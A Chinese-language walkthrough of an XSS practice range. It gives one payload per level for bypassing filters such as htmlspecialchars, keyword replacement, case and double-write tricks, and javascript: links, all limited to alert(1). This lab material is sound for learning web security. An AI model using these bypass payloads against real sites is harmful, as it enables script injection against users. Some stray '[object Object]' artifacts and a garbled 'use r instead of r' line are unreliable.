哆啦集成了网络上常见的靶场与GitHub上比较好的靶场系统,配合一键启动模式,省去你去收集再进行搭建的时间,方便你更加快速的学习信息安全。
该靶场已经正式开源,黑白网去除登录限制重构靶场环境,bachang.heibai.org
F12查看了源码发现并没有任何过滤,
<script>alert(1)</script>
XSS挑战赛第二关
查看源码发现<>尖括号无法使用
框内输入
" onmouseover=alert(1)>[object Object]
或者将input文本框提前闭合
"><script>alert(1)</script>[object Object]
和第二关的区别在于代码内多了一句value='".htmlspecialchars($str)."'
无法使用尖括号,so继续使用不用尖括号的弹窗
' onmouseover=alert(1)//
在源码构成
<input name="keyword" value=" " onmouseover="alert(1)//'">
即可
htmlspecialchars+尖括号过滤
在没有尖括号并且语句不被htmlspecialchars()函数影响的情况下
输入
" onclick=alert(1) //
在点击搜索框触发XSS
strreplace 就直接把on转换成 o_n 这样就过滤了js事件但是没过滤尖括号
所以
"><a href=javascript:alert(1)>
即可
点击“>触发
script 转换成 scr_ipt on 转换成 o_n src 转换成 sr_c data 转换成 da_ta href 转换成 hr_ef
但是没有大小写约束
"> <Script>alert(1)</script> //
直接冲冲冲
禁用了大小写同时script,on,src ,data ,href 都直接转换成空。
利用双写绕过
">hello<sscriptcript>alert(1)</sscriptcript>
script 转换成 scr_ipt on 转换成 o_n src 转换成 sr_c data 转换成 da_ta href 转换成 hr_ef 大小写禁用 " 被编码,但是尖括号等符号没有被过滤,输出点在a标签内,href属性中
javascript会被替换成javasc_rpt,我们使用r来代替r
键入
javascript:alert(1)
并点击添加后,再点击友情链接即可触发
查看源码发现不带http://即为不合法提交
javascript:alert(1)//http://heibai.org
键入后点击友情链接即可触发
查看源代码,有get参数有隐藏框
keyword = test&t_sort="type="text" onclick = "alert(1)
直接冲冲冲